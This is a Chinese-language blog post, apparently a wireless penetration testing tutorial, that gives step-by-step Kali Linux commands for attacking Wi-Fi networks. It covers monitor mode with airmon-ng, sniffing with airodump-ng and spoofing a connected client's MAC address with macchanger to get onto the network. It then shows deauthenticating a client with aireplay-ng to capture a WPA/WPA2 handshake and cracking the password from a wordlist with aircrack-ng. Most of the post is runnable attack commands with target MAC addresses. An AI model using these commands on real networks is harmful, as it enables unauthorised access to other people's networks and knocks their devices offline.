type
Post
status
Published
date
May 11, 2023
slug
summary
tags
category
无线渗透
icon
password
初识无线网卡指令&&配置00 Kali虚拟机连接网卡01 iwconfig 查看网卡名称02 关停不兼容进程03 网卡设置为侦听模式04 过程参数解析基于MAC身份伪造攻击00 网卡设置侦听模式01 网卡设置抓包模式02 修改物理机MAC地址实现身份伪造04 连接AP获取内网ip地址05 内网探测无线AP的WPA/2协议攻击00 网卡设置侦听模式01 扫描存活的无线AP02 抓取无线AP的握手包03 攻击客户端获取握手包04 成功获取握手包的提示05 使用握手包爆破AP密码
初识无线网卡指令&&配置
00 Kali虚拟机连接网卡

01 iwconfig 查看网卡名称
网卡名称:wlan0

02 关停不兼容进程
airmon-ng check kill

回显空白:无不兼容进程。 回显id值:自动kill掉不兼容进程,接下来执行03步骤即可。
03 网卡设置为侦听模式
airmon-ng start wlan0

侦听模式启动成功: (mac80211 monitor mode already enabled for [phy3]wlan0 on [phy3]wlan0)
04 过程参数解析
基于MAC身份伪造攻击
00 网卡设置侦听模式
airmon-ng check kill
airmon-ng start wlan0
01 网卡设置抓包模式
-c 1:指定无线ap的通信信道。
airodump-ng wlan0

airodump-ng wlan0 -c 1 --bssid E4:AA:5D:6F:CF:51

已连接无线AP的客户端:EC:2E:98:3B:11:63
02 修改物理机MAC地址实现身份伪造
PA1:先关闭无线网卡 ifconfig wlan0 down PA2:修改mac地址 macchanger -m EC:2E:98:3B:11:63 wlan0 PA3:开启无线网卡 ifconfig wlan0 up PA3:查看mac地址是否修改成功。 ifconfig wlan0
macchanger -m EC:2E:98:3B:11:63 wlan0


04 连接AP获取内网ip地址
到kali的设置,手动连接ap,并设置MAC地址:


05 内网探测

PS:AP有两台相同MAC的STA,所以hacker机器发送数据包时,会出现丢包的(网速差)
无线AP的WPA/2协议攻击
00 网卡设置侦听模式
airmon-ng check kill
airmon-ng start wlan0
01 扫描存活的无线AP
iwconfig:查询网卡名称,wlan0则是网卡名称。
airodump-ng wlan0

02 抓取无线AP的握手包
--bssid:指定想要攻击的无线AP的MAC地址。 -w:握手包保存的目录和名称。
airodump-ng --bssid 38:A4:ED:B4:EE:90 wlan0 -c 1 -w ./Xs_MI

已连接ap的客户端有:E0:89:7E:36:B2:2A
03 攻击客户端获取握手包
-0 2:发送2个攻击包 -a:指定无线AP的MAC地址 -c:指定已经连接的客户端的MAC地址 wlan0:网卡名称 PA:将已连接客户端踢下线,然后客户端一般会自动连接AP,而从我们可以抓取到握手包。 PS:抓取握手包窗口不关闭,在另外窗口进行操作:
aireplay-ng -0 2 -a 38:A4:ED:B4:EE:90 -c E0:89:7E:36:B2:2A wlan0

04 成功获取握手包的提示
当出现”handshake“字样时,表示成功抓取到握手包。

05 使用握手包爆破AP密码
aircrack-ng -w ~/20220709/top6000.txt Xs_MI-01.cap

- 作者:轻言易梦
- 链接:https://hexo.xslover.xyz/article/d57961c3-5350-4b63-bc2f-d99c78d58f44
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。


